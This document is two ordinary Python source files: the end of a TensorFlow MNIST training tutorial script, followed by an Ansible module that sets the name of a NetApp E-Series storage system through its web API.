images_placeholder = tf.placeholder(tf.float32, shape=(batch_size,
mnist.IMAGE_PIXELS))
labels_placeholder = tf.placeholder(tf.int32, shape=(batch_size))
return images_placeholder, labels_placeholder
def fill_feed_dict(data_set, images_pl, labels_pl):
"""Fills the feed_dict for training the given step.
A feed_dict takes the form of:
feed_dict = {
<placeholder>: <tensor of values to be passed for placeholder>,
....
}
Args:
data_set: The set of images and labels, from input_data.read_data_sets()
images_pl: The images placeholder, from placeholder_inputs().
labels_pl: The labels placeholder, from placeholder_inputs().
Returns:
feed_dict: The feed dictionary mapping from placeholders to values.
"""
# Create the feed_dict for the placeholders filled with the next
  # `batch size` examples.
images_feed, labels_feed = data_set.next_batch(FLAGS.batch_size,
FLAGS.fake_data)
feed_dict = {
images_pl: images_feed,
labels_pl: labels_feed,
}
return feed_dict
def do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_set):
"""Runs one evaluation against the full epoch of data.
Args:
sess: The session in which the model has been trained.
eval_correct: The Tensor that returns the number of correct predictions.
images_placeholder: The images placeholder.
labels_placeholder: The labels placeholder.
data_set: The set of images and labels to evaluate, from
input_data.read_data_sets().
"""
# And run one epoch of eval.
true_count = 0 # Counts the number of correct predictions.
steps_per_epoch = data_set.num_examples // FLAGS.batch_size
num_examples = steps_per_epoch * FLAGS.batch_size
for step in xrange(steps_per_epoch):
feed_dict = fill_feed_dict(data_set,
images_placeholder,
labels_placeholder)
true_count += sess.run(eval_correct, feed_dict=feed_dict)
precision = true_count / num_examples
print(' Num examples: %d Num correct: %d Precision @ 1: %0.04f' %
(num_examples, true_count, precision))
def run_training():
"""Train MNIST for a number of steps."""
# Get the sets of images and labels for training, validation, and
# test on MNIST.
data_sets = input_data.read_data_sets(FLAGS.train_dir, FLAGS.fake_data)
# Tell TensorFlow that the model will be built into the default Graph.
with tf.Graph().as_default():
# Generate placeholders for the images and labels.
images_placeholder, labels_placeholder = placeholder_inputs(
FLAGS.batch_size)
# Build a Graph that computes predictions from the inference model.
logits = mnist.inference(images_placeholder,
FLAGS.hidden1,
FLAGS.hidden2)
# Add to the Graph the Ops for loss calculation.
loss = mnist.loss(logits, labels_placeholder)
# Add to the Graph the Ops that calculate and apply gradients.
train_op = mnist.training(loss, FLAGS.learning_rate)
# Add the Op to compare the logits to the labels during evaluation.
eval_correct = mnist.evaluation(logits, labels_placeholder)
# Build the summary operation based on the TF collection of Summaries.
summary_op = tf.merge_all_summaries()
# Create a saver for writing training checkpoints.
saver = tf.train.Saver()
# Create a session for running Ops on the Graph.
sess = tf.Session()
# Run the Op to initialize the variables.
init = tf.initialize_all_variables()
sess.run(init)
# Instantiate a SummaryWriter to output summaries and the Graph.
summary_writer = tf.train.SummaryWriter(FLAGS.train_dir, sess.graph)
# And then after everything is built, start the training loop.
for step in xrange(FLAGS.max_steps):
start_time = time.time()
# Fill a feed dictionary with the actual set of images and labels
# for this particular training step.
feed_dict = fill_feed_dict(data_sets.train,
images_placeholder,
labels_placeholder)
# Run one step of the model. The return values are the activations
# from the `train_op` (which is discarded) and the `loss` Op. To
# inspect the values of your Ops or variables, you may include them
# in the list passed to sess.run() and the value tensors will be
# returned in the tuple from the call.
_, loss_value = sess.run([train_op, loss],
feed_dict=feed_dict)
duration = time.time() - start_time
# Write the summaries and print an overview fairly often.
if step % 100 == 0:
# Print status to stdout.
print('Step %d: loss = %.2f (%.3f sec)' % (step, loss_value, duration))
# Update the events file.
summary_str = sess.run(summary_op, feed_dict=feed_dict)
summary_writer.add_summary(summary_str, step)
summary_writer.flush()
# Save a checkpoint and evaluate the model periodically.
if (step + 1) % 1000 == 0 or (step + 1) == FLAGS.max_steps:
saver.save(sess, FLAGS.train_dir, global_step=step)
# Evaluate against the training set.
print('Training Data Eval:')
do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_sets.train)
# Evaluate against the validation set.
print('Validation Data Eval:')
do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_sets.validation)
# Evaluate against the test set.
print('Test Data Eval:')
do_eval(sess,
eval_correct,
images_placeholder,
labels_placeholder,
data_sets.test)
def main(_):
run_training()
if __name__ == '__main__':
tf.app.run()
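# Illustrative invocation (not part of the original tutorial): each
# flags.DEFINE_* value above can be overridden on the command line, e.g.
#
#   python fully_connected_feed.py --max_steps=5000 --hidden1=256 --learning_rate=0.05
#
# The script filename is assumed; the flag names match the definitions above.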
|
the-stack_106_23379 | #!/usr/bin/python
# (c) 2018, NetApp, Inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: netapp_e_global
short_description: NetApp E-Series manage global settings configuration
description:
- Allow the user to configure several of the global settings associated with an E-Series storage-system
version_added: '2.7'
author: Michael Price (@lmprice)
extends_documentation_fragment:
- netapp.eseries
options:
name:
description:
- Set the name of the E-Series storage-system
- This label/name doesn't have to be unique.
- May be up to 30 characters in length.
aliases:
- label
log_path:
description:
- A local path to a file to be used for debug logging
required: no
notes:
- Check mode is supported.
- This module requires Web Services API v1.3 or newer.
"""
EXAMPLES = """
- name: Set the storage-system name
netapp_e_global:
name: myArrayName
api_url: "10.1.1.1:8443"
api_username: "admin"
api_password: "myPass"
"""
RETURN = """
msg:
description: Success message
returned: on success
type: str
sample: The settings have been updated.
name:
description:
- The current name/label of the storage-system.
returned: on success
sample: myArrayName
type: str
"""
import json
import logging
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.netapp import request, eseries_host_argument_spec
from ansible.module_utils._text import to_native
HEADERS = {
"Content-Type": "application/json",
"Accept": "application/json",
}
class GlobalSettings(object):
def __init__(self):
argument_spec = eseries_host_argument_spec()
argument_spec.update(dict(
name=dict(type='str', required=False, aliases=['label']),
log_path=dict(type='str', required=False),
))
self.module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True, )
args = self.module.params
self.name = args['name']
self.ssid = args['ssid']
self.url = args['api_url']
self.creds = dict(url_password=args['api_password'],
validate_certs=args['validate_certs'],
url_username=args['api_username'], )
self.check_mode = self.module.check_mode
log_path = args['log_path']
# logging setup
self._logger = logging.getLogger(self.__class__.__name__)
if log_path:
logging.basicConfig(
level=logging.DEBUG, filename=log_path, filemode='w',
format='%(relativeCreated)dms %(levelname)s %(module)s.%(funcName)s:%(lineno)d\n %(message)s')
if not self.url.endswith('/'):
self.url += '/'
if self.name and len(self.name) > 30:
self.module.fail_json(msg="The provided name is invalid, it must be < 30 characters in length.")
def get_name(self):
try:
(rc, result) = request(self.url + 'storage-systems/%s' % self.ssid, headers=HEADERS, **self.creds)
if result['status'] in ['offline', 'neverContacted']:
self.module.fail_json(msg="This storage-system is offline! Array Id [%s]." % (self.ssid))
return result['name']
except Exception as err:
self.module.fail_json(msg="Connection failure! Array Id [%s]. Error [%s]." % (self.ssid, to_native(err)))
def update_name(self):
name = self.get_name()
update = False
if self.name != name:
update = True
body = dict(name=self.name)
if update and not self.check_mode:
try:
(rc, result) = request(self.url + 'storage-systems/%s/configuration' % self.ssid, method='POST',
data=json.dumps(body), headers=HEADERS, **self.creds)
self._logger.info("Set name to %s.", result['name'])
# This is going to catch cases like a connection failure
except Exception as err:
self.module.fail_json(
msg="We failed to set the storage-system name! Array Id [%s]. Error [%s]."
% (self.ssid, to_native(err)))
return update
def update(self):
update = self.update_name()
name = self.get_name()
self.module.exit_json(msg="The requested settings have been updated.", changed=update, name=name)
def __call__(self, *args, **kwargs):
self.update()
def main():
settings = GlobalSettings()
settings()
if __name__ == '__main__':
main()
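# Illustrative playbook task (not part of the original module): the same call
# as in EXAMPLES above, additionally enabling the optional debug log defined
# by this module's `log_path` option. All values are placeholders.
#
#   - name: Set the storage-system name with debug logging
#     netapp_e_global:
#       name: myArrayName
#       log_path: /tmp/netapp_e_global.log
#       api_url: "10.1.1.1:8443"
#       api_username: "admin"
#       api_password: "myPass"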
|